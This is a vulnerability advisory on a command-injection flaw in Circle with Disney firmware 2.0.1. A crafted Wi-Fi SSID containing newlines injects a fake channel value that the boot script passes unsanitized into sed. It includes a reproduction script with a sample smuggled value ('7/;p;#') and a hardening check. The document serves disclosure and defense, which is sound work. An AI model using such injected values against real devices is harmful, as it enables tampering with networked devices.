### Summary
An exploitable vulnerability exists in the WiFi channel parsing of Circle with Disney running firmware 2.0.1. A specially crafted SSID can cause the device to execute arbitrary sed commands. An attacker needs to set up an access point reachable by the device to trigger this vulnerability.
### Tested Versions
Circle with Disney 2.0.1
### Product URLs
https://meetcircle.com/
### CVSSv3 Score
7.4 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
### CWE
CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
### Details
Circle with Disney is a network device used to monitor internet use of children on a given network.
At the end of the boot process, the script "/mnt/shares/usr/bin/startcircle" is executed. The script configures NTP, network interfaces, firewall rules and starts cronjobs.
Part of the script configures an Access Point, which is actually useful only for the initial configuration of the device.
```
...
# [1]
$DIR/scripts/aplist_create.sh
# [2]
best_ch=`awk 'BEGIN{max=-1000;} /Channel:/{ch=$4} /Signal/{s=$2+0; if (s>max){ max=s; maxch=ch}} END{print maxch}' /tmp/ap_list.out`
[ "x$best_ch" != "x" ] && {
echo $best_ch > /tmp/current_channel
# [3]
sed -i "s/channel=.*/channel=$best_ch/g" /tmp/hostapd.conf
}
...
```
At [1] the script calls `aplist_create.sh`, which has the following contents:
```
#!/bin/sh
ifconfig ra0 up
iwinfo ra0 scan > /tmp/ap_list.out # [4]
```
`iwinfo` [4] prints the list of Access Points detected by `ra0`; every entry has the following form:
```
Cell 01 - Address: 11:22:33:44:55:66
          ESSID: "valid-ssid"
          Mode: Master  Channel: 1
          Signal: -22 dBm  Quality: 70/70
          Encryption: WPA2 PSK (CCMP)
```
After `ap_list.out` has been created at [1], the initial script selects the channel with the best signal. The channel is extracted as a string by `awk`, using its default (whitespace) field separators [2]: the fourth field of every line containing `Channel:` is remembered, and whenever a line containing `Signal` carries a higher value in its second field than any seen before, the remembered channel string becomes the candidate. No check is made that the result is numeric.
Finally, at [3] the channel string is substituted into a `sed` command line without any sanitization.
An SSID field in an 802.11 frame has a maximum length of 32 bytes and can contain any character, including new-lines. Moreover, `iwinfo` prints the characters found in the SSID without escaping. An attacker may therefore broadcast an SSID containing new-line characters to add arbitrary lines to the `iwinfo` output: a fake `Channel:` line whose fourth field is attacker-chosen text, followed by a fake `Signal` line whose value is higher than that of any real access point nearby.
Because the `awk` program treats those injected lines like any other, the attacker controls the channel string it returns, which gets passed unquoted into the `sed` expression at [3]. Anything in that string that closes the `s///` command is then interpreted by `sed` as further commands.
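The following script is an added example, not the device's own code, that reproduces the parsing chain above on a constructed `iwinfo`-style scan dump. The second SSID is the hypothetical 32-byte string `'a\nb c Channel: 7/;p;#\nSignal: 0\n'` written unescaped, as the advisory says `iwinfo` prints it. The script runs the unchanged `awk` selection, applies the resulting string to a throwaway `hostapd.conf` the way step [3] does, and then shows a digits-only check (`is_valid_channel`, an assumed name; the 1..14 range is an assumption for a 2.4 GHz radio) that would have rejected it.

```sh
#!/bin/sh
# Added example, not the device's startcircle script: reproduces the
# iwinfo -> awk -> sed chain with a constructed scan dump.

# Constructed iwinfo-style output. The second ESSID contains new-lines, so
# the unescaped dump gains a fake "Channel:" line and a fake "Signal" line.
# SSID (hypothetical, 32 bytes): 'a\nb c Channel: 7/;p;#\nSignal: 0\n'
scan_output() {
    printf 'Cell 01 - Address: 11:22:33:44:55:66\n'
    printf '          ESSID: "valid-ssid"\n'
    printf '          Mode: Master  Channel: 1\n'
    printf '          Signal: -22 dBm  Quality: 70/70\n'
    printf '          Encryption: WPA2 PSK (CCMP)\n'
    printf 'Cell 02 - Address: aa:bb:cc:dd:ee:ff\n'
    printf '          ESSID: "a\n'
    printf 'b c Channel: 7/;p;#\n'
    printf 'Signal: 0\n'
    printf '"\n'
    printf '          Mode: Master  Channel: 6\n'
    printf '          Signal: -60 dBm  Quality: 40/70\n'
    printf '          Encryption: none\n'
}

# The awk program from startcircle [2], unchanged: the "Channel:" field
# preceding the strongest "Signal" line is returned as an unvalidated string.
best_channel() {
    awk 'BEGIN{max=-1000;} /Channel:/{ch=$4} /Signal/{s=$2+0; if (s>max){ max=s; maxch=ch}} END{print maxch}' "$1"
}

# What step [3] does with that string, on a throwaway hostapd.conf.
# Returns the line count afterwards: the injected string closes the s///
# command, adds a "p" command and comments out the trailing "/g", so sed
# runs attacker-chosen commands (here "p", which duplicates every line).
apply_channel_unsafe() {   # $1 = hostapd.conf path, $2 = channel string
    sed -i "s/channel=.*/channel=$2/g" "$1"
    wc -l < "$1" | tr -d ' '
}

# Hardened check: accept only a non-empty, all-digit channel number in range.
# (1..14 is an assumption for a 2.4 GHz radio; widen it for 5 GHz channels.)
is_valid_channel() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# Demo run (also shows what a reader gets when executing the script).
scan=$(mktemp)
scan_output > "$scan"
ch=$(best_channel "$scan")
echo "best_ch selected by the awk step: '$ch'"

conf=$(mktemp)
printf 'interface=ra0\nchannel=1\n' > "$conf"
echo "hostapd.conf lines after injected sed: $(apply_channel_unsafe "$conf" "$ch")"  # 4 instead of 2

if is_valid_channel "$ch"; then
    echo "accepted"
else
    echo "rejected: '$ch' is not a channel number"
fi
rm -f "$scan" "$conf"
```

With the check in place, `best_ch` is only ever an integer, so nothing it contains can terminate the `s///` command; quoting alone would not help here, since the string is expanded inside the `sed` program rather than passed to it as a file argument.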
### Timeline
* 2017-09-20 - Vendor Disclosure
* 2017-10-31 - Public Release